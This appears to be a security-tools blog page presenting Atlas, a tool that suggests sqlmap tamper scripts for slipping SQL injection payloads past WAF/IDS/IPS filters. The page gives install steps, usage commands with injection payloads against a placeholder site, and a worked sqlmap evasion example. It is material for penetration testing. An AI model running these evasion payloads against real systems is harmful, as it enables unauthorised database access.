Atlas is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS, the tool is based on returned status code.
Screenshot
Installation
$ git clone https://github.com/m4ll0k/Atlas.git atlas
$ cd atlas
$ python atlas.py # python3+
Usage
$ python atlas.py –url http://site.com/index.php?id=Price_ASC –payload=”-1234 AND 4321=4321– AAAA” –random-agent -v
injection point (with %%inject%%):
$ python atlas.py –url http://site.com/index/id/%%10%% –payload=”-1234 AND 4321=4321– AAAA” –random-agent -v
$ python atlas.py –url http://site.com/index/id/ -m POST -D ‘test=%%10%%’ –payload=”-1234 AND 4321=4321– AAAA” –random-agent -v
$ python atlas.py –url http://site.com/index/id/ -H ‘User-Agent: mozilla/5.0%%inject%%’ -H ‘X-header: test’ –payload=”-1234 AND 4321=4321– AAAA” –random-agent -v
$ python atlas.py –url http://site.com/index/id/%%10%% –payload=”-1234 AND 4321=4321– AAAA” –concat “equaltolike,htmlencode” –random-agent -v
$ python atlas.py -g
Also Read – Vault : Tool For Secrets Management, Encryption As A Service & Privileged Access Management
Example
$ python sqlmap.py -u ‘http://site.com/index.php?id=Price_ASC’ –dbs –random-agent -v 3
Price_ASC’) AND 8716=4837 AND (‘yajr’=’yajr is blocked by WAF/IDS/IPS, now trying with Atlas:
$ python atlas.py –url ‘http://site.com/index.php?id=Price_ASC’ –payload=”‘) AND 8716=4837 AND (‘yajr’=’yajr” –random-agent -v
At this point:
$ python sqlmap.py -u ‘http://site.com/index.php?id=Price_ASC’ –dbs –random-agent -v 3 –tamper=versioned
Overview WhatsMyName is a free, community-driven OSINT tool designed to identify where a username exists…
Managing disk usage is a crucial task for Linux users and administrators alike. Understanding which…
Efficient disk space management is vital in Linux, especially for system administrators who manage servers…
Knowing how to check directory sizes in Linux is essential for managing disk space and…
Managing user accounts is a core responsibility for any Linux administrator. Whether you’re securing a…
Linux offers powerful command-line tools for system administrators to view and manage user accounts. Knowing…